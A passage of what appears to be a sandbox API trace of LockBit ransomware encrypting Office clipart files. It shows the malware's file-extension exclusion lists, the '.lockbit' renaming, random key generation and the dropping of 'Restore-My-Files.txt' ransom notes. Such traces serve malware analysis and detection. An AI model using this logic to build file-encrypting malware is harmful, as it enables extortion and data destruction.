[0141.850] lstrcmpiW (lpString1=".mwb", lpString2=".WMF") returned -1 [0141.850] lstrcmpiW (lpString1=".myd", lpString2=".WMF") returned -1 [0141.850] lstrcmpiW (lpString1=".ndf", lpString2=".WMF") returned -1 [0141.850] lstrcmpiW (lpString1=".qry", lpString2=".WMF") returned -1 [0141.850] lstrcmpiW (lpString1=".sdb", lpString2=".WMF") returned -1 [0141.850] lstrcmpiW (lpString1=".sdf", lpString2=".WMF") returned -1 [0141.850] lstrcmpiW (lpString1=".sql", lpString2=".WMF") returned -1 [0141.850] lstrcmpiW (lpString1=".sqlite", lpString2=".WMF") returned -1 [0141.850] lstrcmpiW (lpString1=".sqlite3", lpString2=".WMF") returned -1 [0141.850] lstrcmpiW (lpString1=".sqlitedb", lpString2=".WMF") returned -1 [0141.850] lstrcmpiW (lpString1=".tmd", lpString2=".WMF") returned -1 [0141.850] wsprintfW (in: param_1=0x3d6b290, param_2="%s.lockbit" | out: param_1="C:\\\\Program Files\\Microsoft Office\\CLIPART\\PUB60COR\\J0107456.WMF.lockbit") returned 72 [0141.850] CreateFileW (lpFileName="C:\\\\Program Files\\Microsoft Office\\CLIPART\\PUB60COR\\J0107456.WMF" (normalized: "c:\\program files\\microsoft office\\clipart\\pub60cor\\j0107456.wmf"), dwDesiredAccess=0xc0010000, dwShareMode=0x0, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x50000000, hTemplateFile=0x0) returned 0x338 [0141.851] CreateIoCompletionPort (FileHandle=0x338, ExistingCompletionPort=0x14c, CompletionKey=0x0, NumberOfConcurrentThreads=0x0) returned 0x14c [0141.852] malloc (_Size=0x40068) returned 0x3df0008 [0141.852] GetFileSizeEx (in: hFile=0x338, lpFileSize=0x3df0020 | out: lpFileSize=0x3df0020*=3724) returned 1 [0141.852] LoadLibraryA (lpLibFileName="bcrypt.dll") returned 0x753f0000 [0141.852] GetProcAddress (hModule=0x753f0000, lpProcName="BCryptGenRandom") returned 0x753f1e2e [0141.852] BCryptGenRandom (in: hAlgorithm=0x0, pbBuffer=0x3e3003c, cbBuffer=0x10, dwFlags=0x2 | out: pbBuffer=0x3e3003c) returned 0x0 [0141.852] LoadLibraryA (lpLibFileName="bcrypt.dll") returned 0x753f0000 [0141.853] GetProcAddress (hModule=0x753f0000, lpProcName="BCryptGenRandom") returned 0x753f1e2e [0141.853] BCryptGenRandom (in: hAlgorithm=0x0, pbBuffer=0x3e3004c, cbBuffer=0x10, dwFlags=0x2 | out: pbBuffer=0x3e3004c) returned 0x0 [0141.853] ReadFile (in: hFile=0x338, lpBuffer=0x3df003c, nNumberOfBytesToRead=0x10, lpNumberOfBytesRead=0x0, lpOverlapped=0x3df0008 | out: lpBuffer=0x3df003c, lpNumberOfBytesRead=0x0, lpOverlapped=0x3df0008) returned 0x0 [0141.860] RtlDosPathNameToNtPathName_U (in: DosPathName="C:\\\\Program Files\\Microsoft Office\\CLIPART\\PUB60COR\\J0107456.WMF.lockbit", NtPathName=0x3d6b8e8, NtFileNamePart=0x0, DirectoryInfo=0x0 | out: NtPathName="\\??\\C:\\Program Files\\Microsoft Office\\CLIPART\\PUB60COR\\J0107456.WMF.lockbit", NtFileNamePart=0x0, DirectoryInfo=0x0) returned 1 [0141.860] malloc (_Size=0xa6) returned 0x77d7a8 [0141.860] NtSetInformationFile (FileHandle=0x338, IoStatusBlock=0x3d6b6b4, FileInformation=0x77d7a8, Length=0xa6, FileInformationClass=0xa) returned 0xc0000008 [0141.860] free (_Block=0x77d7a8) [0141.860] PathRemoveFileSpecW (in: pszPath="C:\\\\Program Files\\Microsoft Office\\CLIPART\\PUB60COR\\J0107456.WMF" | out: pszPath="C:\\\\Program Files\\Microsoft Office\\CLIPART\\PUB60COR") returned 1 [0141.860] wsprintfW (in: param_1=0x3d6b4a0, param_2="%s\\Restore-My-Files.txt" | out: param_1="C:\\\\Program Files\\Microsoft Office\\CLIPART\\PUB60COR\\Restore-My-Files.txt") returned 72 [0141.860] CreateFileW (lpFileName="C:\\\\Program Files\\Microsoft Office\\CLIPART\\PUB60COR\\Restore-My-Files.txt" (normalized: "c:\\program files\\microsoft office\\clipart\\pub60cor\\restore-my-files.txt"), dwDesiredAccess=0x40000000, dwShareMode=0x0, lpSecurityAttributes=0x0, dwCreationDisposition=0x1, dwFlagsAndAttributes=0x50000000, hTemplateFile=0x0) returned 0xffffffff [0141.860] FindNextFileW (in: hFindFile=0x55fe38, lpFindFileData=0x3d6bd48 | out: lpFindFileData=0x3d6bd48*(dwFileAttributes=0x20, ftCreationTime.dwLowDateTime=0x7502c600, ftCreationTime.dwHighDateTime=0x1c7a765, ftLastAccessTime.dwLowDateTime=0x563ba0b0, ftLastAccessTime.dwHighDateTime=0x1d301bf, ftLastWriteTime.dwLowDateTime=0x7502c600, ftLastWriteTime.dwHighDateTime=0x1c7a765, nFileSizeHigh=0x0, nFileSizeLow=0xdf0, dwReserved0=0x0, dwReserved1=0x0, cFileName="J0107458.WMF", cAlternateFileName="")) returned 1 [0141.860] lstrcmpiW (lpString1=".", lpString2="J0107458.WMF") returned -1 [0141.860] lstrcmpiW (lpString1="..", lpString2="J0107458.WMF") returned -1 [0141.860] PathFindExtensionW (pszPath="J0107458.WMF") returned=".WMF" [0141.860] lstrcmpiW (lpString1=".386", lpString2=".WMF") returned -1 [0141.860] lstrcmpiW (lpString1=".cmd", lpString2=".WMF") returned -1 [0141.860] lstrcmpiW (lpString1=".exe", lpString2=".WMF") returned -1 [0141.860] lstrcmpiW (lpString1=".ani", lpString2=".WMF") returned -1 [0141.860] lstrcmpiW (lpString1=".adv", lpString2=".WMF") returned -1 [0141.860] lstrcmpiW (lpString1=".theme", lpString2=".WMF") returned -1 [0141.861] lstrcmpiW (lpString1=".msi", lpString2=".WMF") returned -1 [0141.861] lstrcmpiW (lpString1=".msp", lpString2=".WMF") returned -1 [0141.861] lstrcmpiW (lpString1=".com", lpString2=".WMF") returned -1 [0141.861] lstrcmpiW (lpString1=".diagpkg", lpString2=".WMF") returned -1 [0141.861] lstrcmpiW (lpString1=".nls", lpString2=".WMF") returned -1 [0141.861] lstrcmpiW (lpString1=".diagcab", lpString2=".WMF") returned -1 [0141.861] lstrcmpiW (lpString1=".lock", lpString2=".WMF") returned -1 [0141.861] lstrcmpiW (lpString1=".ocx", lpString2=".WMF") returned -1 [0141.861] lstrcmpiW (lpString1=".mpa", lpString2=".WMF") returned -1 [0141.861] lstrcmpiW (lpString1=".cpl", lpString2=".WMF") returned -1 [0141.861] lstrcmpiW (lpString1=".mod", lpString2=".WMF") returned -1 [0141.861] lstrcmpiW (lpString1=".hta", lpString2=".WMF") returned -1 [0141.861] lstrcmpiW (lpString1=".icns", lpString2=".WMF") returned -1 [0141.861] lstrcmpiW (lpString1=".prf", lpString2=".WMF") returned -1 [0141.861] lstrcmpiW (lpString1=".rtp", lpString2=".WMF") returned -1 [0141.861] lstrcmpiW (lpString1=".diagcfg", lpString2=".WMF") returned -1 [0141.861] lstrcmpiW (lpString1=".msstyles", lpString2=".WMF") returned -1 [0141.861] lstrcmpiW (lpString1=".bin", lpString2=".WMF") returned -1 [0141.861] lstrcmpiW (lpString1=".hlp", lpString2=".WMF") returned -1 [0141.861] lstrcmpiW (lpString1=".shs", lpString2=".WMF") returned -1 [0141.861] lstrcmpiW (lpString1=".drv", lpString2=".WMF") returned -1 [0141.861] lstrcmpiW (lpString1=".wpx", lpString2=".WMF") returned 1 [0141.861] lstrcmpiW (lpString1=".bat", lpString2=".WMF") returned -1 [0141.861] lstrcmpiW (lpString1=".rom", lpString2=".WMF") returned -1 [0141.861] lstrcmpiW (lpString1=".msc", lpString2=".WMF") returned -1 [0141.862] lstrcmpiW (lpString1=".spl", lpString2=".WMF") returned -1 [0141.862] lstrcmpiW (lpString1=".ps1", lpString2=".WMF") returned -1 [0141.862] lstrcmpiW (lpString1=".msu", lpString2=".WMF") returned -1 [0141.862] lstrcmpiW (lpString1=".ics", lpString2=".WMF") returned -1 [0141.862] lstrcmpiW (lpString1=".key", lpString2=".WMF") returned -1 [0141.862] lstrcmpiW (lpString1=".mp3", lpString2=".WMF") returned -1 [0141.862] lstrcmpiW (lpString1=".reg", lpString2=".WMF") returned -1 [0141.862] lstrcmpiW (lpString1=".dll", lpString2=".WMF") returned -1 [0141.862] lstrcmpiW (lpString1=".ini", lpString2=".WMF") returned -1 [0141.862] lstrcmpiW (lpString1=".idx", lpString2=".WMF") returned -1 [0141.862] lstrcmpiW (lpString1=".sys", lpString2=".WMF") returned -1 [0141.862] lstrcmpiW (lpString1=".hlp", lpString2=".WMF") returned -1 [0141.862] lstrcmpiW (lpString1=".ico", lpString2=".WMF") returned -1 [0141.862] lstrcmpiW (lpString1=".lnk", lpString2=".WMF") returned -1 [0141.862] lstrcmpiW (lpString1=".rdp", lpString2=".WMF") returned -1 [0141.862] lstrcmpiW (lpString1=".lockbit", lpString2=".WMF") returned -1 [0141.862] lstrcmpiW (lpString1="Restore-My-Files.txt", lpString2="J0107458.WMF") returned 1 [0141.862] lstrcmpiW (lpString1="ntldr", lpString2="J0107458.WMF") returned 1 [0141.862] lstrcmpiW (lpString1="ntuser.dat.log", lpString2="J0107458.WMF") returned 1 [0141.862] lstrcmpiW (lpString1="bootsect.bak", lpString2="J0107458.WMF") returned -1 [0141.862] lstrcmpiW (lpString1="autorun.inf", lpString2="J0107458.WMF") returned -1 [0141.862] lstrcmpiW (lpString1="thumbs.db", lpString2="J0107458.WMF") returned 1 [0141.862] lstrcmpiW (lpString1="iconcache.db", lpString2="J0107458.WMF") returned -1 [0141.862] PathAddBackslashW (in: pszPath="C:\\\\Program Files\\Microsoft Office\\CLIPART\\PUB60COR" | out: pszPath="C:\\\\Program Files\\Microsoft Office\\CLIPART\\PUB60COR\\") returned="" [0141.862] PathFindExtensionW (pszPath="C:\\\\Program Files\\Microsoft Office\\CLIPART\\PUB60COR\\J0107458.WMF") returned=".WMF" [0141.862] lstrcmpiW (lpString1=".rar", lpString2=".WMF") returned -1 [0141.863] lstrcmpiW (lpString1=".zip", lpString2=".WMF") returned 1 [0141.863] lstrcmpiW (lpString1=".7z", lpString2=".WMF") returned -1 [0141.863] lstrcmpiW (lpString1=".ckp", lpString2=".WMF") returned -1 [0141.863] lstrcmpiW (lpString1=".dacpac", lpString2=".WMF") returned -1 [0141.863] lstrcmpiW (lpString1=".db", lpString2=".WMF") returned -1 [0141.863] lstrcmpiW (lpString1=".db-shm", lpString2=".WMF") returned -1 [0141.863] lstrcmpiW (lpString1=".db-wal", lpString2=".WMF") returned -1 [0141.863] lstrcmpiW (lpString1=".db3", lpString2=".WMF") returned -1 [0141.863] lstrcmpiW (lpString1=".dbf", lpString2=".WMF") returned -1 [0141.863] lstrcmpiW (lpString1=".dbc", lpString2=".WMF") returned -1 [0141.863] lstrcmpiW (lpString1=".dbs", lpString2=".WMF") returned -1 [0141.863] lstrcmpiW (lpString1=".dbt", lpString2=".WMF") returned -1 [0141.863] lstrcmpiW (lpString1=".dbv", lpString2=".WMF") returned -1 [0141.863] lstrcmpiW (lpString1=".frm", lpString2=".WMF") returned -1 [0141.863] lstrcmpiW (lpString1=".mdf", lpString2=".WMF") returned -1 [0141.863] lstrcmpiW (lpString1=".mrg", lpString2=".WMF") returned -1 [0141.863] lstrcmpiW (lpString1=".mwb", lpString2=".WMF") returned -1 [0141.863] lstrcmpiW (lpString1=".myd", lpString2=".WMF") returned -1 [0141.863] lstrcmpiW (lpString1=".ndf", lpString2=".WMF") returned -1 [0141.863] lstrcmpiW (lpString1=".qry", lpString2=".WMF") returned -1 [0141.863] lstrcmpiW (lpString1=".sdb", lpString2=".WMF") returned -1 [0141.863] lstrcmpiW (lpString1=".sdf", lpString2=".WMF") returned -1 [0141.863] lstrcmpiW (lpString1=".sql", lpString2=".WMF") returned -1 [0141.863] lstrcmpiW (lpString1=".sqlite", lpString2=".WMF") returned -1 [0141.863] lstrcmpiW (lpString1=".sqlite3", lpString2=".WMF") returned -1 [0141.864] lstrcmpiW (lpString1=".sqlitedb", lpString2=".WMF") returned -1 [0141.864] lstrcmpiW (lpString1=".tmd", lpString2=".WMF") returned -1 [0141.864] wsprintfW (in: param_1=0x3d6b290, param_2="%s.lockbit" | out: param_1="C:\\\\Program Files\\Microsoft Office\\CLIPART\\PUB60COR\\J0107458.WMF.lockbit") returned 72 [0141.864] CreateFileW (lpFileName="C:\\\\Program Files\\Microsoft Office\\CLIPART\\PUB60COR\\J0107458.WMF" (normalized: "c:\\program files\\microsoft office\\clipart\\pub60cor\\j0107458.wmf"), dwDesiredAccess=0xc0010000, dwShareMode=0x0, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x50000000, hTemplateFile=0x0) returned 0x338 [0141.865] CreateIoCompletionPort (FileHandle=0x338, ExistingCompletionPort=0x14c, CompletionKey=0x0, NumberOfConcurrentThreads=0x0) returned 0x14c [0141.865] malloc (_Size=0x40068) returned 0x3df0008 [0141.865] GetFileSizeEx (in: hFile=0x338, lpFileSize=0x3df0020 | out: lpFileSize=0x3df0020*=3568) returned 1 [0141.865] LoadLibraryA (lpLibFileName="bcrypt.dll") returned 0x753f0000 [0141.866] GetProcAddress (hModule=0x753f0000, lpProcName="BCryptGenRandom") returned 0x753f1e2e [0141.866] BCryptGenRandom (in: hAlgorithm=0x0, pbBuffer=0x3e3003c, cbBuffer=0x10, dwFlags=0x2 | out: pbBuffer=0x3e3003c) returned 0x0 [0141.866] LoadLibraryA (lpLibFileName="bcrypt.dll") returned 0x753f0000 [0141.866] GetProcAddress (hModule=0x753f0000, lpProcName="BCryptGenRandom") returned 0x753f1e2e [0141.866] BCryptGenRandom (in: hAlgorithm=0x0, pbBuffer=0x3e3004c, cbBuffer=0x10, dwFlags=0x2 | out: pbBuffer=0x3e3004c) returned 0x0 [0141.866] ReadFile (in: hFile=0x338, lpBuffer=0x3df003c, nNumberOfBytesToRead=0x10, lpNumberOfBytesRead=0x0, lpOverlapped=0x3df0008 | out: lpBuffer=0x3df003c, lpNumberOfBytesRead=0x0, lpOverlapped=0x3df0008) returned 0x0 [0141.871] RtlDosPathNameToNtPathName_U (in: DosPathName="C:\\\\Program Files\\Microsoft Office\\CLIPART\\PUB60COR\\J0107458.WMF.lockbit", NtPathName=0x3d6b8e8, NtFileNamePart=0x0, DirectoryInfo=0x0 | out: NtPathName="\\??\\C:\\Program Files\\Microsoft Office\\CLIPART\\PUB60COR\\J0107458.WMF.lockbit", NtFileNamePart=0x0, DirectoryInfo=0x0) returned 1 [0141.871] malloc (_Size=0xa6) returned 0x77d7a8 [0141.871] NtSetInformationFile (FileHandle=0x338, IoStatusBlock=0x3d6b6b4, FileInformation=0x77d7a8, Length=0xa6, FileInformationClass=0xa) returned 0xc0000008 [0141.871] free (_Block=0x77d7a8) [0141.872] PathRemoveFileSpecW (in: pszPath="C:\\\\Program Files\\Microsoft Office\\CLIPART\\PUB60COR\\J0107458.WMF" | out: pszPath="C:\\\\Program Files\\Microsoft Office\\CLIPART\\PUB60COR") returned 1 [0141.872] wsprintfW (in: param_1=0x3d6b4a0, param_2="%s\\Restore-My-Files.txt" | out: param_1="C:\\\\Program Files\\Microsoft Office\\CLIPART\\PUB60COR\\Restore-My-Files.txt") returned 72 [0141.872] CreateFileW (lpFileName="C:\\\\Program Files\\Microsoft Office\\CLIPART\\PUB60COR\\Restore-My-Files.txt" (normalized: "c:\\program files\\microsoft office\\clipart\\pub60cor\\restore-my-files.txt"), dwDesiredAccess=0x40000000, dwShareMode=0x0, lpSecurityAttributes=0x0, dwCreationDisposition=0x1, dwFlagsAndAttributes=0x50000000, hTemplateFile=0x0) returned 0xffffffff [0141.872] FindNextFileW (in: hFindFile=0x55fe38, lpFindFileData=0x3d6bd48 | out: lpFindFileData=0x3d6bd48*(dwFileAttributes=0x20, ftCreationTime.dwLowDateTime=0x7502c600, ftCreationTime.dwHighDateTime=0x1c7a765, ftLastAccessTime.dwLowDateTime=0x65eb5050, ftLastAccessTime.dwHighDateTime=0x1d301bf, ftLastWriteTime.dwLowDateTime=0x7502c600, ftLastWriteTime.dwHighDateTime=0x1c7a765, nFileSizeHigh=0x0, nFileSizeLow=0x258c, dwReserved0=0x0, dwReserved1=0x0, cFileName="J0107468.WMF", cAlternateFileName="")) returned 1 [0141.872] lstrcmpiW (lpString1=".", lpString2="J0107468.WMF") returned -1 [0141.872] lstrcmpiW (lpString1="..", lpString2="J0107468.WMF") returned -1 [0141.872] PathFindExtensionW (pszPath="J0107468.WMF") returned=".WMF" [0141.872] lstrcmpiW (lpString1=".386", lpString2=".WMF") returned -1 [0141.872] lstrcmpiW (lpString1=".cmd", lpString2=".WMF") returned -1 [0141.872] lstrcmpiW (lpString1=".exe", lpString2=".WMF") returned -1 [0141.872] lstrcmpiW (lpString1=".ani", lpString2=".WMF") returned -1 [0141.872] lstrcmpiW (lpString1=".adv", lpString2=".WMF") returned -1 [0141.872] lstrcmpiW (lpString1=".theme", lpString2=".WMF") returned -1 [0141.872] lstrcmpiW (lpString1=".msi", lpString2=".WMF") returned -1 [0141.872] lstrcmpiW (lpString1=".msp", lpString2=".WMF") returned -1 [0141.872] lstrcmpiW (lpString1=".com", lpString2=".WMF") returned -1 [0141.872] lstrcmpiW (lpString1=".diagpkg", lpString2=".WMF") returned -1 [0141.872] lstrcmpiW (lpString1=".nls", lpString2=".WMF") returned -1 [0141.872] lstrcmpiW (lpString1=".diagcab", lpString2=".WMF") returned -1 [0141.873] lstrcmpiW (lpString1=".lock", lpString2=".WMF") returned -1 [0141.873] lstrcmpiW (lpString1=".ocx", lpString2=".WMF") returned -1 [0141.873] lstrcmpiW (lpString1=".mpa", lpString2=".WMF") returned -1 [0141.873] lstrcmpiW (lpString1=".cpl", lpString2=".WMF") returned -1 [0141.873] lstrcmpiW (lpString1=".mod", lpString2=".WMF") returned -1 [0141.873] lstrcmpiW (lpString1=".hta", lpString2=".WMF") returned -1 [0141.873] lstrcmpiW (lpString1=".icns", lpString2=".WMF") returned -1 [0141.873] lstrcmpiW (lpString1=".prf", lpString2=".WMF") returned -1 [0141.873] lstrcmpiW (lpString1=".rtp", lpString2=".WMF") returned -1 [0141.873] lstrcmpiW (lpString1=".diagcfg", lpString2=".WMF") returned -1 [0141.873] lstrcmpiW (lpString1=".msstyles", lpString2=".WMF") returned -1 [0141.873] lstrcmpiW (lpString1=".bin", lpString2=".WMF") returned -1 [0141.873] lstrcmpiW (lpString1=".hlp", lpString2=".WMF") returned -1 [0141.873] lstrcmpiW (lpString1=".shs", lpString2=".WMF") returned -1 [0141.873] lstrcmpiW (lpString1=".drv", lpString2=".WMF") returned -1 [0141.873] lstrcmpiW (lpString1=".wpx", lpString2=".WMF") returned 1 [0141.873] lstrcmpiW (lpString1=".bat", lpString2=".WMF") returned -1 [0141.873] lstrcmpiW (lpString1=".rom", lpString2=".WMF") returned -1 [0141.873] lstrcmpiW (lpString1=".msc", lpString2=".WMF") returned -1 [0141.873] lstrcmpiW (lpString1=".spl", lpString2=".WMF") returned -1 [0141.873] lstrcmpiW (lpString1=".ps1", lpString2=".WMF") returned -1 [0141.873] lstrcmpiW (lpString1=".msu", lpString2=".WMF") returned -1 [0141.873] lstrcmpiW (lpString1=".ics", lpString2=".WMF") returned -1 [0141.873] lstrcmpiW (lpString1=".key", lpString2=".WMF") returned -1 [0141.873] lstrcmpiW (lpString1=".mp3", lpString2=".WMF") returned -1 [0141.873] lstrcmpiW (lpString1=".reg", lpString2=".WMF") returned -1 [0141.874] lstrcmpiW (lpString1=".dll", lpString2=".WMF") returned -1 [0141.874] lstrcmpiW (lpString1=".ini", lpString2=".WMF") returned -1 [0141.874] lstrcmpiW (lpString1=".idx", lpString2=".WMF") returned -1 [0141.874] lstrcmpiW (lpString1=".sys", lpString2=".WMF") returned -1 [0141.874] lstrcmpiW (lpString1=".hlp", lpString2=".WMF") returned -1 [0141.874] lstrcmpiW (lpString1=".ico", lpString2=".WMF") returned -1 [0141.874] lstrcmpiW (lpString1=".lnk", lpString2=".WMF") returned -1 [0141.874] lstrcmpiW (lpString1=".rdp", lpString2=".WMF") returned -1 [0141.874] lstrcmpiW (lpString1=".lockbit", lpString2=".WMF") returned -1 [0141.874] lstrcmpiW (lpString1="Restore-My-Files.txt", lpString2="J0107468.WMF") returned 1 [0141.874] lstrcmpiW (lpString1="ntldr", lpString2="J0107468.WMF") returned 1 [0141.874] lstrcmpiW (lpString1="ntuser.dat.log", lpString2="J0107468.WMF") returned 1 [0141.874] lstrcmpiW (lpString1="bootsect.bak", lpString2="J0107468.WMF") returned -1 [0141.874] lstrcmpiW (lpString1="autorun.inf", lpString2="J0107468.WMF") returned -1 [0141.874] lstrcmpiW (lpString1="thumbs.db", lpString2="J0107468.WMF") returned 1 [0141.874] lstrcmpiW (lpString1="iconcache.db", lpString2="J0107468.WMF") returned -1 [0141.874] PathAddBackslashW (in: pszPath="C:\\\\Program Files\\Microsoft Office\\CLIPART\\PUB60COR" | out: pszPath="C:\\\\Program Files\\Microsoft Office\\CLIPART\\PUB60COR\\") returned="" [0141.874] PathFindExtensionW (pszPath="C:\\\\Program Files\\Microsoft Office\\CLIPART\\PUB60COR\\J0107468.WMF") returned=".WMF" [0141.874] lstrcmpiW (lpString1=".rar", lpString2=".WMF") returned -1 [0141.874] lstrcmpiW (lpString1=".zip", lpString2=".WMF") returned 1 [0141.874] lstrcmpiW (lpString1=".7z", lpString2=".WMF") returned -1 [0141.874] lstrcmpiW (lpString1=".ckp", lpString2=".WMF") returned -1 [0141.874] lstrcmpiW (lpString1=".dacpac", lpString2=".WMF") returned -1 [0141.874] lstrcmpiW (lpString1=".db", lpString2=".WMF") returned -1 [0141.874] lstrcmpiW (lpString1=".db-shm", lpString2=".WMF") returned -1 [0141.875] lstrcmpiW (lpString1=".db-wal", lpString2=".WMF") returned -1 [0141.875] lstrcmpiW (lpString1=".db3", lpString2=".WMF") returned -1 [0141.875] lstrcmpiW (lpString1=".dbf", lpString2=".WMF") returned -1 [0141.875] lstrcmpiW (lpString1=".dbc", lpString2=".WMF") returned -1 [0141.875] lstrcmpiW (lpString1=".dbs", lpString2=".WMF") returned -1 [0141.875] lstrcmpiW (lpString1=".dbt", lpString2=".WMF") returned -1 [0141.875] lstrcmpiW (lpString1=".dbv", lpString2=".WMF") returned -1 [0141.875] lstrcmpiW (lpString1=".frm", lpString2=".WMF") returned -1 [0141.875] lstrcmpiW (lpString1=".mdf", lpString2=".WMF") returned -1 [0141.875] lstrcmpiW (lpString1=".mrg", lpString2=".WMF") returned -1 [0141.875] lstrcmpiW (lpString1=".mwb", lpString2=".WMF") returned -1 [0141.875] lstrcmpiW (lpString1=".myd", lpString2=".WMF") returned -1 [0141.875] lstrcmpiW (lpString1=".ndf", lpString2=".WMF") returned -1 [0141.875] lstrcmpiW (lpString1=".qry", lpString2=".WMF") returned -1 [0141.875] lstrcmpiW (lpString1=".sdb", lpString2=".WMF") returned -1 [0141.875] lstrcmpiW (lpString1=".sdf", lpString2=".WMF") returned -1 [0141.875] lstrcmpiW (lpString1=".sql", lpString2=".WMF") returned -1 [0141.875] lstrcmpiW (lpString1=".sqlite", lpString2=".WMF") returned -1 [0141.875] lstrcmpiW (lpString1=".sqlite3", lpString2=".WMF") returned -1 [0141.875] lstrcmpiW (lpString1=".sqlitedb", lpString2=".WMF") returned -1 [0141.875] lstrcmpiW (lpString1=".tmd", lpString2=".WMF") returned -1 [0141.875] wsprintfW (in: param_1=0x3d6b290, param_2="%s.lockbit" | out: param_1="C:\\\\Program Files\\Microsoft Office\\CLIPART\\PUB60COR\\J0107468.WMF.lockbit") returned 72 [0141.875] CreateFileW (lpFileName="C:\\\\Program Files\\Microsoft Office\\CLIPART\\PUB60COR\\J0107468.WMF" (normalized: "c:\\program files\\microsoft office\\clipart\\pub60cor\\j0107468.wmf"), dwDesiredAccess=0xc0010000, dwShareMode=0x0, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x50000000, hTemplateFile=0x0) returned 0x338 [0141.877] CreateIoCompletionPort (FileHandle=0x338, ExistingCompletionPort=0x14c, CompletionKey=0x0, NumberOfConcurrentThreads=0x0) returned 0x14c [0141.877] malloc (_Size=0x40068) returned 0x3df0008 [0141.877] GetFileSizeEx (in: hFile=0x338, lpFileSize=0x3df0020 | out: lpFileSize=0x3df0020*=9612) returned 1 [0141.877] LoadLibraryA (lpLibFileName="bcrypt.dll") returned 0x753f0000 [0141.878] GetProcAddress (hModule=0x753f0000, lpProcName="BCryptGenRandom") returned 0x753f1e2e [0141.878] BCryptGenRandom (in: hAlgorithm=0x0, pbBuffer=0x3e3003c, cbBuffer=0x10, dwFlags=0x2 | out: pbBuffer=0x3e3003c) returned 0x0 [0141.878] LoadLibraryA (lpLibFileName="bcrypt.dll") returned 0x753f0000 [0141.878] GetProcAddress (hModule=0x753f0000, lpProcName="BCryptGenRandom") returned 0x753f1e2e [0141.878] BCryptGenRandom (in: hAlgorithm=0x0, pbBuffer=0x3e3004c, cbBuffer=0x10, dwFlags=0x2 | out: pbBuffer=0x3e3004c) returned 0x0 [0141.878] ReadFile (in: hFile=0x338, lpBuffer=0x3df003c, nNumberOfBytesToRead=0x10, lpNumberOfBytesRead=0x0, lpOverlapped=0x3df0008 | out: lpBuffer=0x3df003c*, lpNumberOfBytesRead=0x0, lpOverlapped=0x3df0008) returned 1 [0141.910] RtlDosPathNameToNtPathName_U (in: DosPathName="C:\\\\Program Files\\Microsoft Office\\CLIPART\\PUB60COR\\J0107468.WMF.lockbit", NtPathName=0x3d6b8e8, NtFileNamePart=0x0, DirectoryInfo=0x0 | out: NtPathName="\\??\\C:\\Program Files\\Microsoft Office\\CLIPART\\PUB60COR\\J0107468.WMF.lockbit", NtFileNamePart=0x0, DirectoryInfo=0x0) returned 1 [0141.910] malloc (_Size=0xa6) returned 0x77d7a8 [0141.910] NtSetInformationFile (FileHandle=0x338, IoStatusBlock=0x3d6b6b4, FileInformation=0x77d7a8, Length=0xa6, FileInformationClass=0xa) returned 0x0 [0141.912] free (_Block=0x77d7a8) [0141.912] PathRemoveFileSpecW (in: pszPath="C:\\\\Program Files\\Microsoft Office\\CLIPART\\PUB60COR\\J0107468.WMF" | out: pszPath="C:\\\\Program Files\\Microsoft Office\\CLIPART\\PUB60COR") returned 1 [0141.912] wsprintfW (in: param_1=0x3d6b4a0, param_2="%s\\Restore-My-Files.txt" | out: param_1="C:\\\\Program Files\\Microsoft Office\\CLIPART\\PUB60COR\\Restore-My-Files.txt") returned 72 [0141.912] CreateFileW (lpFileName="C:\\\\Program Files\\Microsoft Office\\CLIPART\\PUB60COR\\Restore-My-Files.txt" (normalized: "c:\\program files\\microsoft office\\clipart\\pub60cor\\restore-my-files.txt"), dwDesiredAccess=0x40000000, dwShareMode=0x0, lpSecurityAttributes=0x0, dwCreationDisposition=0x1, dwFlagsAndAttributes=0x50000000, hTemplateFile=0x0) returned 0xffffffff [0141.912] FindNextFileW (in: hFindFile=0x55fe38, lpFindFileData=0x3d6bd48 | out: lpFindFileData=0x3d6bd48*(dwFileAttributes=0x20, ftCreationTime.dwLowDateTime=0x7502c600, ftCreationTime.dwHighDateTime=0x1c7a765, ftLastAccessTime.dwLowDateTime=0x65eb5050, ftLastAccessTime.dwHighDateTime=0x1d301bf, ftLastWriteTime.dwLowDateTime=0x7502c600, ftLastWriteTime.dwHighDateTime=0x1c7a765, nFileSizeHigh=0x0, nFileSizeLow=0x1788, dwReserved0=0x0, dwReserved1=0x0, cFileName="J0107480.WMF", cAlternateFileName="")) returned 1 [0141.912] lstrcmpiW (lpString1=".", lpString2="J0107480.WMF") returned -1 [0141.912] lstrcmpiW (lpString1="..", lpString2="J0107480.WMF") returned -1 [0141.912] PathFindExtensionW (pszPath="J0107480.WMF") returned=".WMF" [0141.912] lstrcmpiW (lpString1=".386", lpString2=".WMF") returned -1 [0141.912] lstrcmpiW (lpString1=".cmd", lpString2=".WMF") returned -1 [0141.912] lstrcmpiW (lpString1=".exe", lpString2=".WMF") returned -1 [0141.912] lstrcmpiW (lpString1=".ani", lpString2=".WMF") returned -1 [0141.912] lstrcmpiW (lpString1=".adv", lpString2=".WMF") returned -1 [0141.912] lstrcmpiW (lpString1=".theme", lpString2=".WMF") returned -1 [0141.912] lstrcmpiW (lpString1=".msi", lpString2=".WMF") returned -1 [0141.912] lstrcmpiW (lpString1=".msp", lpString2=".WMF") returned -1 [0141.912] lstrcmpiW (lpString1=".com", lpString2=".WMF") returned -1 [0141.912] lstrcmpiW (lpString1=".diagpkg", lpString2=".WMF") returned -1 [0141.912] lstrcmpiW (lpString1=".nls", lpString2=".WMF") returned -1 [0141.912] lstrcmpiW (lpString1=".diagcab", lpString2=".WMF") returned -1 [0141.912] lstrcmpiW (lpString1=".lock", lpString2=".WMF") returned -1 [0141.913] lstrcmpiW (lpString1=".ocx", lpString2=".WMF") returned -1 [0141.913] lstrcmpiW (lpString1=".mpa", lpString2=".WMF") returned -1 [0141.913] lstrcmpiW (lpString1=".cpl", lpString2=".WMF") returned -1 [0141.913] lstrcmpiW (lpString1=".mod", lpString2=".WMF") returned -1 [0141.913] lstrcmpiW (lpString1=".hta", lpString2=".WMF") returned -1 [0141.913] lstrcmpiW (lpString1=".icns", lpString2=".WMF") returned -1 [0141.913] lstrcmpiW (lpString1=".prf", lpString2=".WMF") returned -1 [0141.913] lstrcmpiW (lpString1=".rtp", lpString2=".WMF") returned -1 [0141.913] lstrcmpiW (lpString1=".diagcfg", lpString2=".WMF") returned -1 [0141.913] lstrcmpiW (lpString1=".msstyles", lpString2=".WMF") returned -1 [0141.913] lstrcmpiW (lpString1=".bin", lpString2=".WMF") 